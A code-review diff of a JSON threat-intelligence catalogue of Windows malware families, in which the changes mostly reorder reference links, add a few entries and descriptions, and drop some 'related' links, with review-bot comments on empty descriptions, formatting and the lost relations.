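Review bot: this hunk consists solely of deleting the `related` entry pointing at c76874cd-0d73-4cbf-8d39-a066900dd4ce; no reference or description change accompanies it. Confirm the relation is intentionally retired rather than lost by a regeneration that does not carry `related` through, because the removal is silent from the user's perspective.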
@@ -20220,8 +21519,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.deputydog",
- "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html",
"https://www.secureworks.com/research/threat-profiles/bronze-keystone",
+ "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html",
"https://web.archive.org/web/20130924130243/https://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html"
],
"synonyms": [],
@@ -20261,23 +21560,23 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf",
- "https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/",
- "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
- "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
- "https://web.archive.org/web/20180310053107/https://www.rsaconference.com/writable/presentations/file_upload/hta-w02-dissecting-derusbi.pdf",
- "https://attack.mitre.org/groups/G0001/",
- "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
- "https://cybergeeks.tech/analyzing-apt19-malware-using-a-step-by-step-method/",
"https://attack.mitre.org/groups/G0096",
- "https://web.archive.org/web/20151216071054/http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family",
- "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf",
- "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/",
- "https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html",
"https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
- "https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf"
+ "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
+ "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf",
+ "https://attack.mitre.org/groups/G0001/",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
+ "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/",
+ "https://cybergeeks.tech/analyzing-apt19-malware-using-a-step-by-step-method/",
+ "https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/",
+ "https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf",
+ "https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf",
+ "https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html",
+ "https://web.archive.org/web/20151216071054/http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family",
+ "https://web.archive.org/web/20180310053107/https://www.rsaconference.com/writable/presentations/file_upload/hta-w02-dissecting-derusbi.pdf"
],
"synonyms": [
"PHOTO"
@@ -20292,7 +21591,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.desertblade",
- "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/"
+ "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf",
+ "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk"
],
"synonyms": [],
"type": []
@@ -20312,6 +21613,19 @@
"uuid": "44168d77-338d-46ad-a5f6-c17c2b6b0631",
"value": "Devil's Rat"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.devopt",
+ "https://www.zscaler.com/blogs/security-research/introducing-devopt-multifunctional-backdoor-arsenal"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "7d7a870d-725f-4ea3-b344-9c1ad0500618",
+ "value": "DevOpt"
+ },
{
"description": "",
"meta": {
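Review bot: another new cluster with an empty description; the only non-Malpedia reference is the Zscaler post whose slug already calls DevOpt a multifunctional backdoor, so a sentence to that effect costs nothing. Consider adding a generator check that flags new entries whose description is empty.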
@@ -20341,15 +21655,15 @@
"value": "Dexphot"
},
{
- "description": "",
+ "description": "Dexter is a computer virus or point of sale malware which infects computers running Microsoft Windows and was discovered by IT security firm Seculert, in December 2012. It infects PoS systems worldwide and steals sensitive information such as Credit Card and Debit Card information.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Dexter-Malware--Getting-Your-Hands-Dirty/",
+ "https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html",
"http://contagiodump.blogspot.com/2012/12/dexter-pos-infostealer-samples-and.html",
"https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html",
- "https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/"
],
"synonyms": [
"LusyPOS"
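Review bot: the new Dexter description is loosely worded and, unlike the other descriptions added in this patch ("According to PCrisk", "Trend Micro describes"), names no source. "a computer virus or point of sale malware" hedges between two categories when the references in this hunk (Trustwave, and Trend Micro's "infostealer targets checkout systems") describe a PoS infostealer; the stray comma in "Seculert, in December 2012" and the capitalised "Credit Card and Debit Card" also need cleaning up. Suggest one sentence: what it is, what it targets, who reported it and when.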
@@ -20364,35 +21678,37 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma",
- "https://thedfirreport.com/2020/06/16/the-little-ransomware-that-couldnt-dharma/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
- "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
"https://www.youtube.com/watch?v=LUxOcpIRxmg",
- "https://twitter.com/JakubKroustek/status/1087808550309675009",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
"https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground",
- "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/",
- "https://www.group-ib.com/media/iran-cybercriminals/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/dharma-ransomware-uses-av-tool-to-distract-from-malicious-activities/",
- "https://cyberveille-sante.gouv.fr/cyberveille-sante/1821-france-retour-dexperience-suite-une-attaque-par-rancongiciel-contre-une",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://www.zscaler.com/blogs/security-research/ransomware-delivered-using-rdp-brute-force-attack",
- "https://www.acronis.com/en-us/articles/Dharma-ransomware/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware",
- "https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/",
- "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware",
- "https://www.carbonblack.com/2018/07/10/carbon-black-tau-threat-analysis-recent-dharma-ransomware-highlights-attackers-continued-use-open-source-tools/",
- "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
- "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
"https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/",
+ "https://www.zscaler.com/blogs/security-research/ransomware-delivered-using-rdp-brute-force-attack",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
"https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
"https://news.sophos.com/en-us/2020/08/12/color-by-numbers-inside-a-dharma-ransomware-as-a-service-attack/",
- "https://securelist.com/cis-ransomware/104452/"
+ "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
+ "https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://www.acronis.com/en-us/articles/Dharma-ransomware/",
+ "https://www.carbonblack.com/2018/07/10/carbon-black-tau-threat-analysis-recent-dharma-ransomware-highlights-attackers-continued-use-open-source-tools/",
+ "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://securelist.com/cis-ransomware/104452/",
+ "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware",
+ "https://cyberveille-sante.gouv.fr/cyberveille-sante/1821-france-retour-dexperience-suite-une-attaque-par-rancongiciel-contre-une",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/",
+ "https://thedfirreport.com/2020/06/16/the-little-ransomware-that-couldnt-dharma/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://twitter.com/JakubKroustek/status/1087808550309675009",
+ "https://www.group-ib.com/media/iran-cybercriminals/",
+ "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/dharma-ransomware-uses-av-tool-to-distract-from-malicious-activities/"
],
"synonyms": [
"Arena",
@@ -20406,18 +21722,18 @@
"value": "Dharma"
},
{
- "description": "",
+ "description": "According to PCrisk, DiamondFox is highly modular malware offered as malware-as-a-service, and is for sale on various hacker forums. Therefore, cyber criminals who are willing to use DiamondFox do not necessarily require any technical knowledge to perform their attacks.\r\n\r\nOnce purchased, this malware can be used to log keystrokes, steal credentials (e.g., usernames, email addresses, passwords), hijack cryptocurrency wallets, perform distributed denial of service (DDoS) attacks, and to carry out other malicious tasks.\r\n\r\nDiamondFox allows cyber criminals to choose which plug-ins to keep activated and see infection statistics in real-time.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.diamondfox",
- "https://github.com/samoceyn/Diamondfox-Technical-Analysis-Report/blob/6375314ccecdf3fe450f975a384bcc1b16f068a8/D%C4%B0AMONDFOX%20Technical%20Analysis%20Report.PDF",
- "https://www.scmagazine.com/inside-diamondfox/article/578478/",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/",
"http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/",
- "https://blog.cylance.com/a-study-in-bots-diamondfox",
- "https://fr3d.hk/blog/diamondfox-bank-robbers-will-be-replaced",
"https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/",
- "https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/"
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://fr3d.hk/blog/diamondfox-bank-robbers-will-be-replaced",
+ "https://blog.cylance.com/a-study-in-bots-diamondfox",
+ "https://www.scmagazine.com/inside-diamondfox/article/578478/",
+ "https://github.com/samoceyn/Diamondfox-Technical-Analysis-Report/blob/6375314ccecdf3fe450f975a384bcc1b16f068a8/D%C4%B0AMONDFOX%20Technical%20Analysis%20Report.PDF"
],
"synonyms": [
"Crystal",
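Review bot: the DiamondFox description embeds literal `\r\n\r\n` paragraph breaks, whereas every other description in this range is a single line; if the Malpedia export carries CRLF, strip or normalise it in the generator so the JSON stays consistent and diff-friendly. The attribution ("According to PCrisk") is good and should be the model for the other new descriptions in this patch.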
@@ -20434,18 +21750,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.diavol",
- "https://www.bleepingcomputer.com/news/security/trickbot-gang-developer-arrested-when-trying-to-leave-korea/",
- "https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider",
- "https://chuongdong.com/reverse%20engineering/2021/12/17/DiavolRansomware/",
"https://medium.com/walmartglobaltech/diavol-the-enigma-of-ransomware-1fd78ffda648",
- "https://securityintelligence.com/posts/analysis-of-diavol-ransomware-link-trickbot-gang/",
- "https://thedfirreport.com/2021/12/13/diavol-ransomware/",
- "https://heimdalsecurity.com/blog/is-diavol-ransomware-connected-to-wizard-spider/",
"https://arcticwolf.com/resources/blog/karakurt-web",
- "https://www.binarydefense.com/threat_watch/new-ransomware-diavol-being-dropped-by-trickbot/",
- "https://www.scythe.io/library/adversary-emulation-diavol-ransomware-threatthursday",
+ "https://chuongdong.com/reverse%20engineering/2021/12/17/DiavolRansomware/",
"https://www.bleepingcomputer.com/news/security/fbi-links-diavol-ransomware-to-the-trickbot-cybercrime-group/",
+ "https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider",
+ "https://thedfirreport.com/2021/12/13/diavol-ransomware/",
+ "https://securityintelligence.com/posts/analysis-of-diavol-ransomware-link-trickbot-gang/",
+ "https://medium.com/walmartglobaltech/diavol-resurfaces-91dd93c7d922",
+ "https://www.bleepingcomputer.com/news/security/trickbot-gang-developer-arrested-when-trying-to-leave-korea/",
+ "https://www.scythe.io/library/adversary-emulation-diavol-ransomware-threatthursday",
"https://www.ic3.gov/Media/News/2022/220120.pdf",
+ "https://www.binarydefense.com/threat_watch/new-ransomware-diavol-being-dropped-by-trickbot/",
+ "https://heimdalsecurity.com/blog/is-diavol-ransomware-connected-to-wizard-spider/",
"https://www.bleepingcomputer.com/news/security/diavol-ransomware-sample-shows-stronger-connection-to-trickbot-gang/"
],
"synonyms": [],
@@ -20459,8 +21776,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dilljuice",
- "https://securelist.com/apt-trends-report-q1-2021/101967/",
- "https://threatvector.cylance.com/en_us/home/threat-spotlight-menupass-quasarrat-backdoor.html"
+ "https://threatvector.cylance.com/en_us/home/threat-spotlight-menupass-quasarrat-backdoor.html",
+ "https://securelist.com/apt-trends-report-q1-2021/101967/"
],
"synonyms": [],
"type": []
@@ -20491,15 +21808,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "9fed4326-a7ad-4c58-ab87-90ac3957d82f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "8f5ce8a6-c5fe-4c62-b25b-6ce0f3b724c5",
"value": "Dimnie"
},
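Review bot: same silent removal of a `related` link here (dest-uuid 9fed4326-a7ad-4c58-ab87-90ac3957d82f, almost-certain, similar) with nothing else in the hunk. Three such deletions in this range (DDKONG, Deprimon, Dimnie) point to the regeneration script not preserving `related`, so check the rest of the file for the same loss before merging.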
@@ -20534,12 +21842,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dirtymoe",
- "https://decoded.avast.io/martinchlumecky/dirtymoe-rootkit-driver/",
- "https://decoded.avast.io/martinchlumecky/dirtymoe-1/",
"https://decoded.avast.io/martinchlumecky/dirtymoe-4/",
- "https://decoded.avast.io/martinchlumecky/dirtymoe-5/",
+ "https://thehackernews.com/2022/03/purple-fox-hackers-spotted-using-new.html",
"https://decoded.avast.io/martinchlumecky/dirtymoe-3/",
- "https://thehackernews.com/2022/03/purple-fox-hackers-spotted-using-new.html"
+ "https://decoded.avast.io/martinchlumecky/dirtymoe-5/",
+ "https://decoded.avast.io/martinchlumecky/dirtymoe-1/",
+ "https://decoded.avast.io/martinchlumecky/dirtymoe-rootkit-driver/"
],
"synonyms": [],
"type": []
@@ -20552,8 +21860,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dispcashbr",
- "https://twitter.com/r3c0nst/status/1232944566208286720",
- "https://insights.oem.avira.com/atm-malware-targets-wincor-and-diebold-atms/"
+ "https://insights.oem.avira.com/atm-malware-targets-wincor-and-diebold-atms/",
+ "https://twitter.com/r3c0nst/status/1232944566208286720"
],
"synonyms": [],
"type": []
@@ -20579,29 +21887,30 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.disttrack",
- "https://securelist.com/shamoon-the-wiper-copycats-at-work/",
- "https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ad6f8259-2bb4-4f7f-b8e1-710b35a4cbed&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
+ "http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
"https://resources.cylera.com/hubfs/Cylera%20Labs/Cylera%20Labs%20Kwampirs%20Shamoon%20Technical%20Report.pdf",
"https://malwareindepth.com/shamoon-2012/",
- "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis",
- "https://content.fireeye.com/m-trends/rpt-m-trends-2017",
- "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf",
- "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
- "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail",
"https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/",
+ "https://content.fireeye.com/m-trends/rpt-m-trends-2017",
"http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412",
- "http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/",
- "https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/",
- "https://unit42.paloaltonetworks.com/unit42-second-wave-shamoon-2-attacks-identified/",
- "https://web.archive.org/web/20120818235442/https://www.symantec.com/connect/blogs/shamoon-attacks",
- "https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf",
"http://contagiodump.blogspot.com/2012/08/shamoon-or-disttracka-samples.html",
+ "http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware",
+ "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon",
+ "https://web.archive.org/web/20120818235442/https://www.symantec.com/connect/blogs/shamoon-attacks",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ad6f8259-2bb4-4f7f-b8e1-710b35a4cbed&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
- "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
- "http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware"
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
+ "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail",
+ "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
+ "https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon",
+ "https://securelist.com/shamoon-the-wiper-copycats-at-work/",
+ "https://unit42.paloaltonetworks.com/unit42-second-wave-shamoon-2-attacks-identified/",
+ "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf",
+ "https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf",
+ "https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/"
],
"synonyms": [
"Shamoon"
@@ -20616,11 +21925,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.divergent",
- "https://blog.talosintelligence.com/2019/09/divergent-analysis.html",
"https://documents.trendmicro.com/assets/Tech-Brief-New-Fileless-Botnet-Novter-Distributed-by-KovCoreG-Malvertising-Campaign.pdf",
+ "https://www.microsoft.com/security/blog/2019/09/26/bring-your-own-lolbin-multi-stage-fileless-nodersok-campaign-delivers-rare-node-js-based-malware/",
+ "https://blog.talosintelligence.com/2019/09/divergent-analysis.html",
"https://www.cert-pa.it/notizie/devergent-malware-fileless/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-fileless-botnet-novter-distributed-by-kovcoreg-malvertising-campaign/",
- "https://www.microsoft.com/security/blog/2019/09/26/bring-your-own-lolbin-multi-stage-fileless-nodersok-campaign-delivers-rare-node-js-based-malware/"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-fileless-botnet-novter-distributed-by-kovcoreg-malvertising-campaign/"
],
"synonyms": [
"Novter"
@@ -20648,8 +21957,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dma_locker",
- "https://blog.malwarebytes.com/threat-analysis/2016/05/dma-locker-4-0-known-ransomware-preparing-for-a-massive-distribution/",
"https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/",
+ "https://blog.malwarebytes.com/threat-analysis/2016/05/dma-locker-4-0-known-ransomware-preparing-for-a-massive-distribution/",
"https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-strikes-back/"
],
"synonyms": [],
@@ -20702,11 +22011,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dnsmessenger",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
- "https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/",
- "https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html",
"https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html",
"https://blog.talosintelligence.com/2017/03/dnsmessenger.html",
+ "https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/",
"http://wraithhacker.com/2017/10/11/more-info-on-evolved-dnsmessenger/"
],
"synonyms": [
@@ -20722,19 +22031,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dnspionage",
- "https://www.lastline.com/labsblog/threat-actor-cold-river-network-traffic-analysis-and-a-deep-dive-on-agent-drable/",
- "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html",
"https://www.secureworks.com/research/threat-profiles/cobalt-edgewater",
- "https://nsfocusglobal.com/apt34-event-analysis-report/",
"https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/",
- "https://marcoramilli.com/2019/04/23/apt34-webmask-project/",
- "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html",
- "https://blog-cert.opmd.fr/dnspionage-focus-on-internal-actions/",
- "https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html",
- "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.us-cert.gov/ncas/alerts/AA19-024A"
+ "https://www.lastline.com/labsblog/threat-actor-cold-river-network-traffic-analysis-and-a-deep-dive-on-agent-drable/",
+ "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/",
+ "https://blog-cert.opmd.fr/dnspionage-focus-on-internal-actions/",
+ "https://www.us-cert.gov/ncas/alerts/AA19-024A",
+ "https://marcoramilli.com/2019/04/23/apt34-webmask-project/",
+ "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html",
+ "https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html",
+ "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html",
+ "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/",
+ "https://nsfocusglobal.com/apt34-event-analysis-report/"
],
"synonyms": [
"Agent Drable",
@@ -20746,6 +22055,19 @@
"uuid": "ef46bd90-91d0-4208-b3f7-08b65acb8438",
"value": "DNSpionage"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnwipe",
+ "https://www.trellix.com/en-us/about/newsroom/stories/research/wipermania-an-all-you-can-wipe-buffet.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0f6c16ec-e15c-480b-a5d3-cf5efe71821a",
+ "value": "dnWipe"
+ },
{
"description": "DogHousePower is a PyInstaller-based ransomware targeting web and database servers. It is delivered through a PowerShell downloader and was hosted on Github.",
"meta": {
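Review bot: the new dnWipe entry ships with `"description": ""`, so apart from the name and the Trellix "Wipermania" title nothing in the entry tells a reader what the family is. Other entries in this file also have empty descriptions, but a newly added cluster is the cheapest place to put a one-line description while the source is at hand.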
@@ -20761,13 +22083,28 @@
"uuid": "14d3518a-d8cb-4fbd-80aa-8bec4fc8ad13",
"value": "DogHousePower"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.domino",
+ "https://securityintelligence.com/posts/ex-conti-fin7-actors-collaborate-new-domino-backdoor/",
+ "https://securityintelligence.com/posts/ex-conti-fin7-actors-collaborate-new-domino-backdoor"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "37169b2f-344e-4913-ab91-d447d597ffa7",
+ "value": "Minodo"
+ },
{
